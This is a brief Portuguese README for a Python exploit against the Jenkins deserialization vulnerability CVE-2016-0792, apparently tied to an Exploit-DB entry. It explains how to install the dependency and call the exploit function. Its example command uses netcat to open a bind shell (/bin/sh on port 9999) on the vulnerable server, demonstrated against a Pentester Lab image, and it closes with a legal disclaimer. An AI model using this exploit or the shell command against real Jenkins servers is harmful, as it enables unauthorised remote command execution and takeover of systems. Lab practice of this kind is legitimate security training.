
Exploit para vulnerabilidade de serialização do Jenkins - CVE-2016-0792
https://www.exploit-db.com/exploits/42394/
Python 3.6.x
A biblioteca requests é necessária para que este exploit funcione
sudo pip install requests
python3
from exploit import exploit
exploit(url, command)
Onde url é a URL do servidor Jenkins e command é o comando a ser executado
exploit('http://192.168.56.101/jenkins/', '/usr/bin/nc -l -p 9999 -e /bin/sh')
Isso executará nc e escutará na porta 9999 na máquina vulnerável
Para fins de demonstração, estarei executando a ISO do Pentester Lab
Usar este software para atacar alvos sem permissão é ilegal. Não me responsabilizo por qualquer dano causado pelo uso deste software contra a lei.